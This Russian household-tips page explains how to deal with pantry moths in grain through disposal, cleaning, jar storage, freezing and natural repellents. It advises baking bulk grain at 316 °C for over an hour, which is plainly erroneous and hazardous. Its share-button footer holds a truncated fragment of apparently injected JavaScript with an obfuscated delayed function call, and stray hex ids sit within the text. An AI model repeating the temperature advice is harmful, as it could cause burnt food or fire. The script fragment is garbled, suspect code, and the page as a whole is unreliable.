www.osnovosti.ru
smk-pride.ru

Как избавиться от пищевой моли в крупе

05e0fc17
Как избавиться от пищевой моли в крупе
Моль в крупе или других сыпучих продуктах может завестись у любой хозяйки. Вы просто можете принести эту противную букашку из магазина вместе с купленным товаром. К сожалению, ею заражены очень многие склады с сухими сыпучими продуктами. Давайте разберемся, чем вредна эта самая моль пищевая, и как избавиться от такого неприятного жильца на вашей кухне.

Основной урон наносят как раз не сами бабочки моли, а их личинки, т.е. гусеницы. Именно они способны, во-первых, прогрызть любой пакет: и бумажный, и целлофановый, а во-вторых, оставить от вашей крупы одну требуху. Гусеницы невероятно прожорливы.

Кроме крупы пищевая моль может поселиться в сухофруктах, орехах, муке, во всех видах бобовых и даже в печенье и конфетах. Употреблять в пищу зараженные продукты ни в коем случае нельзя. Выбросите их без сожаления, т.к. после того, как в них поселилась моль, ничего полезного для питания там уже не осталось.

Вот практические советы, как избавиться от пищевой моли:

Выбросите все зараженные продукты. Не пытайтесь их «спасти», перебирая каждую крупинку.
Тщательно вымойте шкафчики с уксусом, борной кислотой, лимонным соком или просто мыльным раствором. Щели пройдите кисточкой, смоченной в уксусе.
Тщательно смойте все простой водой и проветрите помещение.
Купите липкую ленту для моли, но помните, что она предназначена только для бабочек моли, а не для личинок.
Как известно: лучший способ избавить себя от проблем – произвести профилактические действия. Поэтому, чтобы оградить себя от нежелательных «квартирантов», следует выполнять такие рекомендации:

Не закупайте продукты впрок! Муку, крупы, макаронные изделия лучше съедать за 3–4 недели, а затем покупать новые. Уже прошли голодные года, все есть на полках магазинов и скидки на товар бывают очень часто!
Храните в стеклянных банках все, что только возможно! Причем банки лучше выбрать герметично и закрывающиеся. Кроме того, в стекле все хорошо видно, и если где-то завелся паразит, то вы его очень быстро ликвидируете, да и выкинуть придется только одну банку, а не содержимое всего шкафа.
Регулярно проводите «ревизию» в кухонных шкафах и делайте там влажную уборку.
Моль в крупе боится высоких температур. Если вам все же необходимо приобрести сыпучие продукты в большом количестве, то сделайте следующее: прокалите все в духовке при 316оС в течение 1-1,5часов. Эта процедура убьет и личинок, и яйца, и взрослых особей.
Пищевая моль также не выдерживает и низких температур. Положите пакет с продуктом в морозильную камеру на 2-3 суток и вопрос решится. При температуре ниже –10 градусов все личинки также погибают.
Разложите по полкам кухонных шкафов маленькие, слегка надрезанные, дольки чеснока. Также можно использовать свежие листики мяты или цветы лаванды.
Вот и все о том, как избавиться от пищевой моли в крупе, желаем вам успеха в этом бою!
b717b126

Share andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Enjoy:
  • Добавить ВКонтакте заметку об этой странице
  • Twitter
  • Facebook
  • Яндекс.Закладки
  • Одноклассники

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

Этот сайт использует Akismet для борьбы со спамом. Узнайте, как обрабатываются ваши данные комментариев.

Яндекс.Метрика